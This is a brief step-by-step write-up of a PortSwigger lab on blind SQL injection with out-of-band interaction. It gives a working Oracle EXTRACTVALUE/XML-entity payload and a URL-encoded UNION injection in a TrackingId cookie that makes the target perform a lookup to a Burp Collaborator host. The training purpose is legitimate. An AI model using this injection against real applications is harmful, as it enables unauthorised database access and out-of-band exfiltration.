https://portswigger.net/web-security/sql-injection/blind/lab-out-of-band
Lab objective: exploit the SQL injection vulnerability to cause a DNS lookup to Burp Collaborator.
Lab: Blind SQL injection with out-of-band interaction
- Open burp-suit
Collaboratortab and clickCopy to clipboardbutton. This will give you a unique subdomain. My subdomain isusq6c7axj5wmu5p5e4z5fn748vem2cq1.oastify.com - Go to cheat sheet and go DNS lookup section and use Oracle payload the payload is
SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual - Now replace the
BURP-COLLABORATOR-SUBDOMAINwith your subdomain. - Because it is a union base attack so you need to add
UNIONfirst and at last you should URL encode the payload so my payload isTrackingId=BuDoLyKZ2n0Bxh9u'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//usq6c7axj5wmu5p5e4z5fn748vem2cq1.oastify.com/">+%25remote%3b]>'),'/l')+FROM+dual-- - Then click
Pull nowfrom theCollaboratortab.